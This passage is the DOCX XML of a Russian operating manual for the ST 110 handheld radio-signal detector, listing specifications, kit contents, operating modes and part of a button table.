        </w:tblPrEx>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Габариты, мм</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90x54x21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Вес, кг, не более</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0.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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СВЧ анетенна - детектор ST 110.SHF</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tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Диапазон частот, МГц</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2000-7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Пороговая чувствительность, Вт/см2</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(2-9)* 1 О'10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Динамический диапазон, дБ</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45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00876548" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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Потребляемый ток, мА, не более</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>В комплект изделия входят следующие компоненты:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Основной блок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> ВЧ-антенна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> СВЧ антенна-детектор «ST 1 1 0.SHF»*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Кабель USB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Зарядное устройство/блок питания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Мини-CD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Техническое описание и руководство по эксплуатации. * поставляется дополнительно</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>У</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>стройство и работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Принцип действия ST110 основан на широкополосном детектировании электрического поля. Для измерения частоты стабильного сигнала педусмотрен частотомер. Идентификация сигналов цифровых стандартов передачи данных реализована на основе оригинальных алгоритмов анализа и обработки сигнала. Вывод графической и численной информации осуществляется на цветной OLED дисплей, звукового продетектированного сигнала на встроенный излучатель или головные телефоны. Управление осуществляется при помощи шестикнопочной пленочной клавиатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Использование СВЧ антенны-детектора расширяет частотный диапазон ST 110 до 7ГГц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Специальное программное обеспечение «ST 110 Analyzer» обеспечивает работу ST 110 под управлением PC, что расширяет возможности пользователя по визуализации полученной информации, ее сохранению и последующему анализу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:t>ежимы работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>ST 110 имеет два основных режима работы: ПОИСК и МОНИТОРИНГ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Дополнительными режимами являются: ПРОСМОТР ПРОТОКОЛА, ОСЦИЛЛОГРАФ и САМОПИСЕЦ. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Режим ПОИСК</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Данный режим предназначен для поиска и определения местоположения РТС. Использование данного режима основано на визуальной оценке уровня сигналов на 32 сегментной шкале. Дополнительно используется раздельная индикация непрерывного и импульсного видов сигналов, отображение идентифицированных сигналов — GEM, DECT, BLUETOOTH и WLAN, а также индикация частоты стабильного во времени сигнала.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Обеспечена возможность акустического контроля посредством головных телефонов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Режим МОНИТОРИНГ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Предназначен для автономной работы ST 1 1 0 по предварительно установленным условиям. Сохранение информации об обнаруженных сигналах осуществляется в энергонезависимой памяти изделия (9 банков по 999 событий). Обеспечена работа по расписанию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> Режим ПРОСМОТР ПРОТОКОЛА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Предназначен для просмотра протокола событий произошедших в результате работы изделия в режиме МОНИТОРИНГ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t xml:space="preserve"> Предусмотрена возможность сортировки событий по времени наступления, длительности или уровню сигнала.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.3</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> ОПИСАНИЕ СВЧ АНТЕННЫ-ДЕТЕКТОРА «ST 110.SHF»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>«ST110.SHF» конструктивно состоит из широкополосного логарифмического детектора и антенны с круговой диаграммой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.4</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> МАРКИРОВАНИЕ И ПЛОМБИРОВАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Для маркировки используется шильд, установленный на задней крышке основного блока. На нем, методом металлографии, нанесено название изделия и его серийный номер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>5.5</w:t>
      </w:r>
      <w:r w:rsidRPr="004A52FB">
        <w:tab/>
        <w:t xml:space="preserve"> УПАКОВКА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Для транспортировки и хранения компоненты изделия размещается в прямоугольной коробке из гофрированного картона размером 170x150x60.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="004A52FB">
        <w:t>Для удобной и надежной укладки компонентов изделия предусмотрены пенополиуретановые прокладки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5301" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="179"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="579"/>
        <w:gridCol w:w="3970"/>
        <w:gridCol w:w="4216"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="983" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Кнопка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Основная</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>функция</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Дополнительная функция Используется при настройке изделия через МЕНЮ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="983" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Цвет шрифта</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Белый</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Желтый</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="983" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>Выбор режи</w:t>
            </w:r>
            <w:r w:rsidRPr="004A52FB">
              <w:softHyphen/>
              <w:t>мов ПОИСК, МОНИТОРИНГ и включение/вы</w:t>
            </w:r>
            <w:r w:rsidRPr="004A52FB">
              <w:softHyphen/>
              <w:t>ключение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="983" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>| PWWMODE |</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="983" w:type="pct"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2069" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="88" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="Arial4pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ZERO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1948" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="004A52FB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="2pt"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Установка </w:t>
            </w:r>
            <w:r w:rsidRPr="004A52FB">
              <w:rPr>
                <w:rStyle w:val="21"/>
